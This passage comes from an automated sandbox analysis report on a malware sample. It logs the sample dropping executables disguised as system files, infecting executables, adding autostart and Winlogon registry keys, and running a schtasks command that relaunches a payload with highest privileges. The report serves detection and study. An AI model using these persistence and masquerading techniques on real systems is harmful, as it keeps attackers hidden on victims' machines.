                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Recovery\ctfmon.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\QMBYhgjh.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\rUslzROg.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\yRglcgIV.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\PYxQwTnj.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\KlfRTWYv.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\zxBbjKdN.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\QMBYhgjh.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\KlfRTWYv.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\zxBbjKdN.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\rUslzROg.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\PYxQwTnj.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile created: C:\Users\user\Desktop\yRglcgIV.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41KJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhostJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41KJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41KJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41KJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LzmJLVB41KJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgkJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
